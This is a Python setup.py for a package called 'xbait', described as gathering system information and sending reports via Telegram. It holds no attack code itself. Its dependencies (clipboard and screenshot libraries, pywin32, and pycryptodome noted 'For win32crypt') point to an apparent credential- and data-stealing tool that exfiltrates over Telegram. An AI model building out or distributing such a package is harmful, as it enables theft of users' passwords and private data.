# setup.py
from setuptools import setup, find_packages

setup(
    name='xbait',
    version='2.7',
    packages=find_packages(),
    install_requires=[
        'requests',
        'psutil',
        'pyautogui',
        'pyperclip',
        'pywin32',
        'tqdm',
        'pycryptodome',  # For win32crypt
    ],
    entry_points={
        'console_scripts': [
            'xbait=xbait.main:main',
        ],
    },
    author='Christlieb Dela',
    author_email='ilovenyxx@gmail.com',
    description='A script to gather system information and send reports via Telegram',
    license='MIT',
    keywords='system info cyber security telegram',
    url='https://github.com/ilovenyxx',  # Example URL
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
    ],
    python_requires='>=3.6',
)
